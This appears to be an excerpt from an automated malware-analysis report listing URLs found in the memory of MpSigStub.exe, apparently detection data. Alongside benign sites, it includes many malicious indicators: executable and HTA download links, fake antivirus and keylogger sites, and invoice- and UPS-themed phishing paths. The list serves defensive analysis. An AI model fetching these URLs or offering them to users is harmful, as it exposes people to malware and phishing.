Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.aldimarche.eu/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.alexa.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.alibaba.com
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.alphadecimal.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.amazon.com
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.apple.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.beidou123.cn/count.asp
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.cakedan.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.charlesboyer.it/invoice-for
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.cnn.com
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.my8899.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.mymediacenter.in/crime/index.php
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.namu-in.com//bbs/data/init.htm
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.natwest.com/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.nba.com
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.nerddogueto.com.br
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.netscape.com
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.niepicowane.pl/
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.nytimes.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.o2.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.ooooos.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.pardislab.com/ups-us/feb-12-18-04-16-13/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.pasillorosa.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-tune.ch/getip.php
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattemedia.com/links/site
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.platteregistrations.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/a
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.pornhub.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.pp1234.net/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.public.health.wa.gov.au/3/1428/2/apply_to_install_a_wastewater_system.pm
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://www.qq5.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.rakehunter.com/o/file.hta
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.rezababy.blogfa.com
